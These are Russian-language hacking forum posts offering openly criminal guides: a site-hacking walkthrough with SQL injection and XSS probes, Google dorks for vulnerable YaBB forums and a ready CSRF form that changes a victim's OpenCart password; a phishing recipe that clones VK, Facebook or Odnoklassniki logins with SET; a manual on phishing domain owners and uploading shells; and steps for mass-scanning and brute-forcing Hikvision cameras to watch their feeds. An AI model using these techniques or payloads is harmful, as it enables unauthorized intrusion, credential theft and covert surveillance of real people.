Aggressive OS guesses: Crestron XPanel control system (90%), Netgear DG834G WAP or Western Digital WD TV media player (90%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6) (87%), Linux 2.6.32 (85%), Linux 3.0 - 3.1 (85%)
No exact OS matches for host (test conditions non-ideal).

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.76 seconds

Подробнее здесь - https://nmap.org/man...-detection.html
Это не всегда верная информация, поэтому полностью полагаться на нее не стоит.

Нам нужно узнать, какой программный сервер использует сайт. Чаще всего это либо Nginx, либо Apache.
Иногда это можно увидеть если вбить неправильный урл и при необработке его сайтом, этим займется сервер. Такое бывает чаще всего на самописных сайтах.
Например - https://bitcointalk.org/ind2
Если вам повезет, там будет также версия. Обычно этим грешит Apache.

Но даже если 404 ошибка обрабатывается сайтом - можно ввести очень длинный урл в строку запроса. Чтобы нам выдало ошибку - 414 Request-URI Too Large
Там иногда может быть версия.

-- Полезные страницы
Бывает полезно знать страницы логина, админку и некоторые другие страницы. Чтобы их отыскать вы можете попробовать перебрать основные известные варианты, либо найти их в коде страницы или же в карте сайта. Для подобных дел можно написать простой скрипт или же использовать готовое решение. Нумитира кстати публиковал на Runion какой-то скрипт на перл.
Может быть также гугл проиндексировал их. Учите запросы гугла site:, inurl:, filetype: и другие

Также можно угадать например в wordpress - wp-admin/, wp-login/ -
В xenforo - это admin.php

2) Ищем уязвимые места
Разумеется сначала нужно попробовать найти известные уязвимости по той информации, которую мы собрали в предыдущем пункте.

Здесь могут помочь сайты:
https://www.exploit-db.com/
http://www.exploitalert.com/

Например ищем все эксплоиты по Вордпресс - http://www.exploital...earch=Wordpress

Или по конкретным плагинам - http://www.exploital...rdpress gallery

Что делать с найденными эксплоитами будет рассмотрено в следующем разделе.

А пока подумаем, что же делать, если нам неизвестны версии ПО или же это самописный сайт.
Тут друг мой придется потрудиться ручками. Какие же основные уязвимости бывают на сайтах?

-- SQL - Ошибка в запросах баз данных. Вы должны знать, что каждый сайт имеет БД, в которой хранит постоянно какую-то информацию. Это может быть база пользователей, статей и многое другое. Когда мы вводим какой-то урл, сайт обращается к базе и извлекает нам данные в виде понятной для браузера формы - html-разметки

Поступают запросы от юзера обычно двух типов - GET или же POST
Самый простой способ проверить на наличие sql ошибки ввести в параметр кавычку. Или другие заведомо неправильные параметры.
Например - https://credity5.ru/item/-1

При POST же запросах попробуйте вбить эту самую кавычку в поля формы.
Подробнее почитайте этот документ от Positive Technologies - http://www.ptsecurit...L-Injection.pdf

Данная ошибка при правильной эксплуатации позволит извлечь базу данных форума. Для автоматизации используй - sqlmap. Для ручного использования необходимо изучить язык запросов SQL.

-- XSS - Эта ошибка позволяет исполнение скриптов, введенных пользователем.
Проверяется обычно в простом варианте также заполнением параметров запроса данным выражением - <script>alert('xss')</script>
Если вылетит всплывающее сообщение с xss, значит запрос уязвим. Опасна тем, что позволяет украсть определенные данные юзера.

-- CSRF - Запросы от лица юзера. Это уязвимость опасна в случае если сайт имеет возможность логина, но не генерирует для каждой формы специальный csrf-токен.
Тогда возможно создать запрос от лица юзера просто подкинув ему ссылку на веб-страницу на вашем домене. Если сделать автоматом исполняющийся скрипт для отправки запроса при заходе, тогда все будет мгновенно происходить, а юзер может даже и не заметить того.

Например - http://anthilledowsdpbr.onion/
В старых версиях Opencart, на котором он сделан в форме смены пароля не надо было вводить пароль. И благодаря этому можно сменить пасс юзера подкинув ему ссылку на подобный html-файл. Сделан для примера. Там до сих пор нет csrf-токенов, но чтобы заюзать данный файл нужно заменить 123456 на ваш пасс, а остальное на новый. Но вполне вероятно, что для других форм, что есть на подобных сайтах данная уязвимость сработает и просто так. Ищите.
 

<form action="http://сайт.ру/index.php?route=account/password" method="post" enctype="multipart/form-data">
 
    <div class="content">
      <table class="form">
        <tbody>
<tr>
          <td><input name="old_password" value="123456" type="hidden">
            </td>
        </tr>

<tr>
       
          <td><input name="password" value="987654321" type="hidden">
            </td>
        </tr>
        <tr>
         
          <td><input name="confirm" value="987654321" type="hidden">
            </td>
        </tr>
      </tbody></table>
    </div>
    <div class="buttons">
     
      <div class="right"><input value="Continue" class="button" type="submit"></div>
    </div>
  </form>


Это были основные уязвимости. Существует еще множество других, специфических, например PHP Object Injection, основанная на логике языка PHP или ошибки темплейтов в python - django,flask. Чтобы ими воспользоваться вам необходимо изучить конкретику подробнее.

3) Взлом.

В случае с известными уязвимостями вы можете просто использовать готовые эксплойты. В этом нет ничего сложного. Просто чаще всего они публикуются на англ языке. Внимательно вчитывайтесь в описание и восполняйте недостаток знаний путем гугления незнакомых терминов или техник.

Например - http://www.exploital...s.html?id=22706
Здесь речь идет о xss-уязвимости для YaBB, просто подставляем в урл в конец необходимый скрипт. Чтобы этот скрипт принес какую-то пользу ищем, как с помощью javascript компрометировать пользователей или же можете воспользоться xss-фреймворком Beef, который позволяет легко в web-интерфейсе управлять зомби-машинами юзеров.

Также если вы хотите потренироваться на конкретном эксплойте, против заведомо уязвимых сайтов, то читаем такое
Google Dork :
#+ inurl:YaBB.pl?num=
#+ "Powered by YaBB 2.5"
#+ "Powered by YaBB 2.6.11"
Гугл дорк - это то, что необходимо вбить в гугле, чтобы найти уязвимые для данного эксплойта сайты. Все банально просто.

Иногда возможен грубых перебор силой, т.е брутфорс админки сайта или страницы логина. Также в некоторых случаях помогает Социальная Инженерия, но все-таки это больше взлом конкретного человека, а не веб-сайта.

В случае с самописными сайтами вам необходимо пополнить багаж знаний. Чтобы взломать сайт надо минимум также хорошо, как админ понимать, как он работает. Максимум - гораздо больше. Узнаем язык и изучаем. Чаще всего сайты пишутся на php.
Изучаем кратко html,javascript. Читаем информацию о xss,sql,csrf. Понимаем get,post запросы. Пишем простой сайт с нуля, чтобы понимать стандартную структуру.
Изучаем Линукс, чтобы знать на каком серверном ПО хостится сайт и как настраивается сервер.
Учимся программировать на скриптовом языке для понимания эксплойтов или написания простых своих. Для этого подойдет python,perl.

Удачи в нашем нелегком деле...
 


  • Edwardson, nohnigecebyuk85, sapedBef и 4 другим это нравится


#373 Взлом вконтакте/фейсбук/одноклассники через Kali Linux

Написано Hacker 16 Май 2016 - 23:54

Вот представь, ты решил взломать не самую умную жертву и которая тебе конечно же доверяет. Заливать куда-то клон страницы в вк тебе лень, а особо решаешь не заморачиваться и имеешь флешку с Kali Linux под рукой. (Ты должен её иметь!)

 

Способ довольно ламерский, но понятен каждому. Пока это один из способов.
В нашел любимом Kali (Backtrack тоже) есть инструмент SET(Social Engineering Toolkit) его мы и используем.

 

Открываем наш SET через меню или консольку через sudo setoolkit.

 

Выбираем:
Social-Engineering Attacks -> Website Attack Vectors -> Credential Harvester Attack Method -> Site Cloner.
Пишем свой IP адрес. Можно узнать на 2ip либо cmd -> /sbin/ifconfig

 

Ну и вводим vk.com/fb.com/ok.ru или любую соц.сеть, хоть мамбу. Можно хоть форум, всё зависит от того сайта, куда попросите жертву залогиниться.

 

Ждем пока клонирование завершится и нажимаем Enter.

 

Далее берем свой ip и даем жертве. Конечно же нужно его сконвертировать в ссылку. Можете через всякие tinyurl. Если в вк, то рекомендую vk.cc. В остальных случаях, рекомендую иметь в наличии похожий домен и поставить на него редирект на ваш ip.

Жертва должна перейти по ссылочке и вбить пароль. Ну и всё. Тут всё зависит от Вас, доверия жертвы и как вы её убедили.


  • MyleneSi, Edwardson, nohnigecebybp74 и 4 другим это нравится


#350 Мануал по взлому сайтов. Руководство для чайников

Написано Hacker 02 Май 2016 - 18:05

Как ломают сайты?

1. Через социнженерию, путем получения доступа к мылу владельца домена и/или админу сайта
2. Через дыры в веб приложении сайта
3. Через дыры в сервере

 

----------------------------------------------------------------------

1. Через взлом админа и/или владельца домена/хостинга

Узнаем данные по домену через история whois. Для рф, ру сайт http://www.who.ru Для прочих http://who.is

Обычно, если домен зареган давно, то в старых записях найдется мыло владельца или того кто регистрировал данный домен.

Если мыло не нашли, ищем другим путем. Т.е. через поисковики, сам сайт и т.д.

Как только есть мыло, в зависимости от почтового сервиса, заливаем фейк и пытаемся утянуть пароль.

 

2. Через дыры в веб приложении сайта

Делаем анализ сайта, например через http://builtwith.com или обычным просмотром  кода страницы. Получаем список скриптов через яндекс site:target.com ".php" или гугл - есть вероятность, даже если например стоит битрикс, что давно использовали другую систему управления или самописные скрипты и в них будет ошибка.

Находим скрипты, загоняем их в SqlMap и пытаемся обнаружить SQL иньекцию

Чекаем на RFI или LFI или Code Execution

Не забываем про поддомены, где также могут быть уязвимые скрипты

 

3. Если у сайта собственный сервак, проверяем порты Nmap и смотрим на версию сервисов, ищем эксплоиты

---------------------------------------------------------

 

После взлома и попадания в админку, заливаем шелл.

 


  • nohnigecebybp74, nohnigecebyuk85, Josephwok и 4 другим это нравится


#216 Как найти взломать камеры видеонаблюдения?!

Написано Joker 27 Январь 2016 - 13:32

Первым делом качаем порт сканер https://github.com/r...dgraham/masscan

 

Запускаем его:

–p8000 -iL hosts.txt --rate=1000 -oX myscan.xml

Потом нам потребуется брутфорс найденных камер. Качаем: https://github.com/s...hacker777/hikka

 

Диапазоны ип адресов по городам или странам добываем из инета: https://4it.me/getlistip

 

Для просмотра видео с камеры потребуется софт: http://overseas.hikv...n/Tools_84.html

 

Наслаждаемся просмотром )

 


  • Edwardson, nohnigecebybp74, nohnigecebyuk85 и 4 другим это нравится